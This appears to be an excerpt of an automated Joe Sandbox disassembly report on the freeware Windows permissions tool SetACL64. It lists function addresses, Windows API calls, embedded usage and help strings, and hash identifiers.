Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
Instruction ID: e7303d0f454eddabc32903c6fea3a2a1a836ac05c9970a9b9704f19ce7137a69
Opcode Fuzzy Hash: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
Instruction Fuzzy Hash: E7F03CB6B08B4583EB24DB55F8502A923A1FB98BC0F589175DA4DC3769DF3CE551C700

Function 00007FF69707BFE8 Relevance: 1.4, Strings: 1, Instructions: 196COMMON

Download Yara Rule

Strings

0, xrefs: 00007FF69707C181

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: 0
API String ID: 3215553584-4108050209
Opcode ID: fe1b77cc4fb1327b84eb0cd94c59786dff3a84c6f721406d97121f11905029f2
Instruction ID: e5fee65b933231a90b5833c0a6f6e299d6db81e260db6a04c82d1f058153918a
Opcode Fuzzy Hash: fe1b77cc4fb1327b84eb0cd94c59786dff3a84c6f721406d97121f11905029f2
Instruction Fuzzy Hash: 83612591A0C28246FA788B695C003BB5799EF42BC8F4405B5DD89D77DACE2DE84787C1

Function 00007FF697089718 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

-, xrefs: 00007FF6970898C4

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID: -
API String ID: 0-2547889144
Opcode ID: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
Instruction ID: 7dcc4914bce7ae0b57c93949639b1a08559f1945b92d0834395564a5cbb303e5
Opcode Fuzzy Hash: 4c1d9a599cc3bcd7ac7ed3d62c53db48a1b6c212b4efefffed7360049bb86f53
Instruction Fuzzy Hash: CB61F4A2A2878585EA709B2994043BEB795FB95BE4F444275DB9EC3BD8DF3ED4008700

Function 00007FF69708D744 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF69708D748

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
Instruction ID: 244447f6c0714a5c7ea6c0a1927d47aaf6412753debe43cc2e6d79ed83c41d11
Opcode Fuzzy Hash: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
Instruction Fuzzy Hash: 6EB092A0E07A0AC2EA182B556C4221422A5BF58B91F8840B8C20DC1320EF2C20A65710

Function 00007FF69707FB00 Relevance: .6, Instructions: 634COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
Instruction ID: 7f910e21fa7e3cb1ac97b9cb64e7b42e4da3c98a17b7e033c277582c1fd364eb
Opcode Fuzzy Hash: 804cbed04cb1b024b7a53ade8bd45d4e88f9643a1cf6792c7eebf2e20a23fd07
Instruction Fuzzy Hash: 6E626EA1E29F5695E6B39F35A8116766324FF663C4F0183B3E80EF6660DF2CF4528600

Function 00007FF69703F650 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID:
API String ID: 2573137834-0
Opcode ID: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
Instruction ID: 5279f2a8bac3189033db61debf5b959acc9906f9595ae28902ab1931698a5bae
Opcode Fuzzy Hash: db6c7db9ba73bacb7339c37cc7ab61be6a1ca176040ca25b453e64a39fde0fd1
Instruction Fuzzy Hash: BE328CA6B04B8586DB24DF26D9906AD6761FB85FC8F058522DF4ED7BA8DF38E441C300

Function 00007FF69703CB20 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
Instruction ID: 4b86630edef89783e385c384f3460f66699f3806b84e38b997780e2c1400fdc1
Opcode Fuzzy Hash: 1bddaa04ba479b5e3c122ea19f61bbb641f9d70ba39f3eaafaf3c5aa2504da0b
Instruction Fuzzy Hash: 6C12BCA2A09A8182DB30DF29D0506BD7B61FB9AF84F4591A6CB8EC7795DF3DD149C300

Function 00007FF6970463E0 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
Instruction ID: f9e6d777c898cb2404f88f36ae6bb5bbce86db04b2ce40676ca9238948625da9
Opcode Fuzzy Hash: 8cc424a777be5028136a971fc0df0c9e471f88d56c3a3877931117becaa86a14
Instruction Fuzzy Hash: 43D147A2A19B89C0EE60CB15D05066973A1FBA8FC4F544676DE8E87B98FF3CE451D340

Function 00007FF69708669C Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorLast$CurrentFeatureInfoLocalePresentProcessProcessortry_get_function
String ID:
API String ID: 959782435-0
Opcode ID: 2bcabf90133226a21d35661e2228ce33e0177fd6ac88b51c4b4a600c06c3f94b
Instruction ID: c72128812a26805762d70c6a1f2b05cdb7cc3d4d6a0589bc772986a4729976c1
Opcode Fuzzy Hash: 2bcabf90133226a21d35661e2228ce33e0177fd6ac88b51c4b4a600c06c3f94b
Instruction Fuzzy Hash: DEB1BDA2A18646C2EB74DF21D4116F933A1EB84BD8F0142B2DA9DC76CADF3EE551C740

Function 00007FF69703E9D0 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
Instruction ID: 774dcf99b49313f3f7c83c8084da495de73ae34824b3e41f08fd0cc1ac984075
Opcode Fuzzy Hash: 623b00d227a4fe3d8e7d417f2b5f2d0ceb4a2eacd56c3b69df033875c0a5ee96
Instruction Fuzzy Hash: 4B61CFA2A28B9A82EB218B59A0409B96760FB55BD0F449731DA6ED7B84DF3CF541C700

Function 00007FF69707C28F Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 012a925594e754a9d222877570faf136357706970be2381824b09a92e36c6048
Instruction ID: ff1ae7b1ff9f906309b5e38aa03431c5ff9bac1ba1036fa2b2a519e9a82ac163
Opcode Fuzzy Hash: 012a925594e754a9d222877570faf136357706970be2381824b09a92e36c6048
Instruction Fuzzy Hash: FE51F496B1C24286EB78DB2588016BF2799EF40BC4F8451B6EE4DD72C9CF2DE845C711

Function 00007FF697083410 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 96fcb21ad8d9e1d397d87a8444214fb1efd1c750d05a8d23a81fb3cc91b1dc5a
Instruction ID: 953a563cc8c7a1b19ceb8efbb387a5008bae0ec7c0dd7fb9980214c0566d5dc2
Opcode Fuzzy Hash: 96fcb21ad8d9e1d397d87a8444214fb1efd1c750d05a8d23a81fb3cc91b1dc5a
Instruction Fuzzy Hash: 9D412562B24A5882EF54CF6AD9141A9B7A1FB8CFD4B099132DE0DC7B58DE3DD1418300

Function 00007FF69708BD40 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
Instruction ID: 0c5a7724c399b0de6896db49b8d399fd707fd26f00cd2039058527ed04c1f9c4
Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
Instruction Fuzzy Hash: FFF062F1B182958ADBA48F6DA80262977D0F7483C1F94C0B9D68DC3B04DA3C90608F14

Function 00007FF697073034 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
Instruction ID: 11ff261bc61706282a80d29171e3f1e7ec37d64a1c43a82be860d33d754b6b1e
Opcode Fuzzy Hash: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
Instruction Fuzzy Hash: 8EA001A190889690E6288B01E961065A220EB61B91B4100B1C20DC2060EE2CA6018244

Function 00007FF697038A80 Relevance: 38.7, APIs: 4, Strings: 18, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF697044810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044859
Part of subcall function 00007FF697044810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF69704486D
Part of subcall function 00007FF697044810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044882
Part of subcall function 00007FF697044810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF69704FCA1), ref: 00007FF697044964

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038D9E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DA4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DAA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697038DB0

Strings

Version: , xrefs: 00007FF697038ADD
License: Freeware, xrefs: 00007FF697038C6D
FileVersion, xrefs: 00007FF697038ABA
SetACL -on ObjectName -ot ObjectType, xrefs: 00007FF697038CA9
Documentation:, xrefs: 00007FF697038CE5
Documentation and examples are maintained at, xrefs: 00007FF697038D09
SetACL by Helge Klein, xrefs: 00007FF697038C2A
=======, xrefs: 00007FF697038C91
https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe, xrefs: 00007FF697038D2D
-actn Action1 ParametersForAction1, xrefs: 00007FF697038CB5
Syntax:, xrefs: 00007FF697038C85
Homepage: https://helgeklein.com, xrefs: 00007FF697038C42
[Options], xrefs: 00007FF697038CCD
==============, xrefs: 00007FF697038CF1
The usage reference can be found at, xrefs: 00007FF697038D21
https://helgeklein.com., xrefs: 00007FF697038D15
[-actn Action2 ParametersForAction2], xrefs: 00007FF697038CC1
Copyright: Helge Klein, xrefs: 00007FF697038C61

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
API String ID: 3000141576-3422969368
Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
Instruction ID: 530d003e04f9705af6509f7fe22c743387bdf2e90b184b17fdb8ca175e9f1156
Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
Instruction Fuzzy Hash: FA916CA1E28A4294EB24DB64E8553BC2331EFA43E8F9045B1E61DC36E6EF7CE544C354

Function 00007FF697088294 Relevance: 36.8, APIs: 10, Strings: 11, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 00007FF6970882AF
try_get_function.LIBVCRUNTIME ref: 00007FF6970882CE

Part of subcall function 00007FF697087998: GetProcAddress.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087AF0

try_get_function.LIBVCRUNTIME ref: 00007FF6970882ED

Part of subcall function 00007FF697087998: LoadLibraryW.KERNELBASE(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A3B
Part of subcall function 00007FF697087998: GetLastError.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A49
Part of subcall function 00007FF697087998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087A8B

try_get_function.LIBVCRUNTIME ref: 00007FF69708830C

Part of subcall function 00007FF697087998: FreeLibrary.KERNEL32(?,?,00000006,00007FF697087E8A,?,?,0000B6CF377E791F,00007FF69708402A,?,?,0000B6CF377E791F,00007FF69707E201), ref: 00007FF697087AC4

try_get_function.LIBVCRUNTIME ref: 00007FF69708832B
try_get_function.LIBVCRUNTIME ref: 00007FF69708834A
try_get_function.LIBVCRUNTIME ref: 00007FF697088369
try_get_function.LIBVCRUNTIME ref: 00007FF697088388
try_get_function.LIBVCRUNTIME ref: 00007FF6970883A7
try_get_function.LIBVCRUNTIME ref: 00007FF6970883C6

Strings

GetLocaleInfoEx, xrefs: 00007FF697088324
LocaleNameToLCID, xrefs: 00007FF6970883CB, 00007FF6970883DE
GetTimeFormatEx, xrefs: 00007FF697088330, 00007FF697088343
AreFileApisANSI, xrefs: 00007FF6970882A8
EnumSystemLocalesEx, xrefs: 00007FF6970882D3, 00007FF6970882E6
GetDateFormatEx, xrefs: 00007FF6970882F2, 00007FF697088305
CompareStringEx, xrefs: 00007FF6970882C7
LCIDToLocaleName, xrefs: 00007FF6970883AC, 00007FF6970883BF
IsValidLocaleName, xrefs: 00007FF69708836E, 00007FF697088381
GetUserDefaultLocaleName, xrefs: 00007FF69708834F, 00007FF697088362
LCMapStringEx, xrefs: 00007FF6970883A0

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
API String ID: 3255926029-3252031757
Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
Instruction ID: 90904a1d57ec2f79eee7469709ec84ac13a10ef384246f49be293cf555b2506c
Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
Instruction Fuzzy Hash: C33192E0D08A47A1F628DBA5E869AF1A721EF443E4FC154BBD10DC32A5DF3DA649C340

Function 00007FF697051200 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 234COMMON

Download Yara Rule

Strings

Input file for trustee operation opened: ', xrefs: 00007FF697051490
" , xrefs: 00007FF697051750
AddTrusteesFromFile, xrefs: 00007FF69705151C

Memory Dump Source

Source File: 00000004.00000002.2069214326.00007FF697031000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF697030000, based on PE: true

Associated: 00000004.00000002.2069179762.00007FF697030000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069328450.00007FF6970BE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2069350598.00007FF6970C7000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff697030000_SetACL64.jbxd

Similarity

API ID:
String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
API String ID: 0-3105513592
Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
Instruction ID: af83d3891f99567ebf502e58aec476e683d05d12e537335f92c372c7e093635f
Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
Instruction Fuzzy Hash: 4EA18BA2A29B5284F720DB64E8953ED3371FB44388F405875EA4CD7AAADF7CE580C344

Function 00007FF69704FC00 Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 467COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF69704FC34
LeaveCriticalSection.KERNEL32 ref: 00007FF69704FC4B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050378
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705037E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050384
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705038A
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF697050396
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF69705039C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503A2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503A8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503AE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503B4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503BA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6970503C0

Strings

on , xrefs: 00007FF69704FF27
Starting SetACL.exe , xrefs: 00007FF69704FF10
FileVersion, xrefs: 00007FF69704FC81
====================================================================, xrefs: 00007FF69704FDF1, 00007FF6970501B0
